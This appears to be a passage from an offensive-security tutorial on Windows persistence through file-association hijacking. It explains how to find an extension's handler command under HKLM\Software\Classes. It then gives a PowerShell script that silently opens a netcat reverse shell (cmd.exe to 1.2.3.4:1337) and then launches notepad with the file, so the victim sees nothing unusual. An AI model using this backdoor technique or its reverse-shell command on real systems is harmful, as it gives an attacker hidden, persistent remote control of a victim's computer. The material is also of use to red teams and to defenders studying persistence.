Hijacking file associations is the same basic idea as hijacking shortcut files. This is a two-step process.

1. Locate the “programmatic ID” of the extension you wish to hijack under HKLM\Software\Classes (this will be the key’s (Default) value).
2. The programmatic ID will also be in HKLM\Software\Classes and will have the command path as the (Default) value for its shell\open\command key.

Note that the programmatic ID command will probably include the %1 placeholder, which is used to pass in the file path. This requires a slightly different script than is used to backdoor shortcuts:

# Create a reverse shell (note that netcat is something that
# the attacker need to provide themselves!)
#
Start-Process -NoNewWindow "C:\Windows\System32\nc.exe" `
	"-e cmd.exe 1.2.3.4 1337"
 
# Fire off the application the user is expecting and pass in
# the supplied file path
#
C:\Windows\System32\notepad.exe "$args"

Note the quoting here, as well as the inclusion of the entire $args array. Most of the documentation I’ve found online suggests using $args[0] as an unquoted argument, but this approach did not work in my testing.